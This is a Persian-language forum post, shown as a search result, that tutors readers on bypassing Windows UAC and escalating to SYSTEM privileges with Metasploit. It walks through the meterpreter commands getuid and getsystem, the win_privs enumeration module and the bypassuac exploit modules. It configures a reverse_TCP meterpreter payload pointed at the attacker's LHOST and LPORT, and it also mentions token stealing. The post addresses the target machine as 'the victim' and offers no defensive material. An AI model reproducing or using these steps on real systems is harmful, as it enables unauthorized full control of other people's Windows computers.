جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'آموزش هک دسترسی ویندوز'.
1 نتیجه پیدا شد
-
بایپس UAC ویندوز ها ، سطح دسترسی سیستمی
Mr.Python پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
سلام برای بایپس UAC یکی از بهترین روش ها استفاده از ماژول های built in در متا اسپلویت هست. هنگامی که شما قصد دارید در ونیدوز 7 ,8, 10 ,.. سطح دسنرسی خود را به ' سیستم ' برسانید ممکن است با پیغام خطا موجه شوید . ماژولی که در باره ان صحبت میکنیم در دسته ماژول های محلی local قرار میگیرد یعنی پس از استفاده از یک ماژول remote و گرفتن دسترسی مناسب میتوان از این ماژول استفاده کرد: getuid use priv getsystem دستورات در پوسته meterpreter وارد میشوند. دستور getsystem که همان ماژولی هست که صحبت کردیم به طور حتم در ویندوز های xp و ویندوز سرور ها جوابگوست اما از ویندوز xp به بعد ویژگی جدیدی به نام UAC ظاهر شد که میتوانست از دستکاری های غیر مجاز جلوگیری کند . پس این ماژول در اینگونه ویندوز ها دارای خطاست مگر اینکه قبلا بایپس کرده باشید. ابتدا اطلاعات سطحی از سیستم قربانی میگیریم : run post/windows/gather/win_privs مشاهده میکنید که در قسمت is admin و یا is system کلمه false و در قسمت uac enabled کلمه true نوشته شده. ما از پوسته meterpreter برای مدتی خارج میشویم (منظور بستن نیست) و بعدماژول های بایپس uac را جستجو میکنیم که bypassuac_injection و bypassuac هستند .طریقه کار هر کدام بسته به ویندوز دارد ( 7 یا 8 یا 10) اگر با یکی جواب نگرفتید مطمئنا دومی جوابگوست . ضمنا با خارج شدن از پوسته شماره نشست session را بیاد داشته باشید: background search uac use exploit/windows/local/bypassuac show options در اینجا متغیر هایی که باید مقدار داده شوند نشان داده خواهد شد . set payload windows/meterpreter/reverse_TCP set LHOST IP set LPORT port set SESSION number set TARGET 0 or 1 خب شماره نشست رو که در قسمت مربوطه وارد کنید شماره target هم برای معماری سیستم طرف هست که اونم داخل show options نوشته شده. در نهایت دستور exploit پیلود بایپس در سیستم اپلود و اجرا میشود و از طریق همان پیلود سطح دسترسی سیستمی اکسپلویت (بهره برداری) میشود. و حالا ماژول getsystem برای انجام این عمل : getsystem برای اطمینان ماژول win_priv را دوباره اجرا کنید: run post/windows/gather/win_priv مقدار is admin و is system برابر true و مقدار uac enabled برابر false قرار داده شده. میتوانید ماژول getuid را فرا بخوانید و ببینید که PE به شما داده شده! getuid خروجی : NT AUTHORITY/SYSTEM حال شما ادمین کلاینت هستید . راه دیگر هم هست به اسم steal token که زیاد مناسب ورژن های جدید ویندوز نیست بیشتر در xp استفاده میشه اونم برا نشان جعلیو افزایش سطح دسترسی که راحتتره و اگر getsystem به دلایل نادری جواب نداد از این روش در xp و ویندوز سرور استفاده میشه.-
- آموزش بایپس uac ویندوز ها
- آموزش بایپس سطح دسترسی سیستمی
- (و 8 مورد دیگر)